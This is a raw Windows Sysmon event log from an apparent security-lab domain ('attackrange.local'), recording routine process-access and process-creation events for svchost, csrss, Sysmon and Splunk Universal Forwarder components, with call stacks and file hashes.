08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.302{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.286{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.286{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.286{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.287{0C1E0330-F712-60EB-BC79-00000000D001}2292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:27.148{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2FD44B16D2246AB13BCEB9899F09F99,SHA256=92EF3719BF2734DE87B0FE598010F53A9B959DC7A10A85402F99FBBA17C1CCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.708{0C1E0330-F713-60EB-BE79-00000000D001}5003816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.567{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.552{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.552{0C1E0330-F713-60EB-BE79-00000000D001}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:27.036{0C1E0330-F712-60EB-BD79-00000000D001}11722516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000809425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 